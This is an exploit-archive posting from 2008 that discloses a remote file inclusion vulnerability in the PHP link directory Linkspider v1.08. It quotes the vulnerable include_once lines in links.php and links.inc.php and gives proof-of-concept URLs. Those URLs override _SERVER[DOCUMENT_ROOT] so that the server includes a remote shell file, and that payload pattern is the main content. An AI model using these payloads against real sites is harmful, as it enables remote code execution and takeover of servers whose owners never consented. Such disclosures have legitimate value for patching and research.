Home / exploits linkspider-rfi.txt
Posted on 08 August 2008
============================================================= Linkspider v.1.08 Remote File Include Vulnerability ============================================================== App Name : Linkspider v.1.08 HomePage : http://www.phoenix.frihost.net/linkspider/read_me.php Vulnerability Discovered by : Rohit Bansal Vuln Code: ---------------- links.php include_once ($_SERVER['DOCUMENT_ROOT'] . "/linkspider/admin/custom.php"); also in links.inc.php include_once ($_SERVER['DOCUMENT_ROOT'] . "/linkspider/admin/custom.php"); POC: --------------- htttp://site.com/[path]/links.php?_SERVER[DOCUMENT_ROOT]=SHELL.txt<http://site.com/%5Bpath%5D/links.php?_SERVER%5BDOCUMENT_ROOT%5D=SHELL.txt> ?? htttp://site.com/[path]/links.inc.php?_SERVER[DOCUMENT_ROOT]=SHELL.txt<http://site.com/%5Bpath%5D/links.inc.php?_SERVER%5BDOCUMENT_ROOT%5D=SHELL.txt> ?? rohitisback[at]gmail.com ================================================================ <http://gmail.com>
